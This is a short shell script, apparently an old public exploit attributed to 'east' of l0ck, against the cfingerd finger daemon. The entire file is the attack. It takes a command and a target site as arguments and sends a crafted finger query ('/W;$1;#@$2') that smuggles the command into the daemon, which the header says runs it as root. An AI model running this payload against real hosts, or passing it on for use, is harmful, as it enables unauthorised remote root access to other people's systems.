#!/bin/sh
#
# The  following  shell  script  exploits
# vulnerability in  cfingerd. By  running this
# you  can execute  arbitrary commands as root.
# Exploit was written by east <east@l0ck.com>

echo "l0ck r0x w1f gl0x"

if [ $# = 2 ]
  then
  finger "/W;$1;#@$2"
else
  echo "$0 \"<command>\" <sitename>"
fi
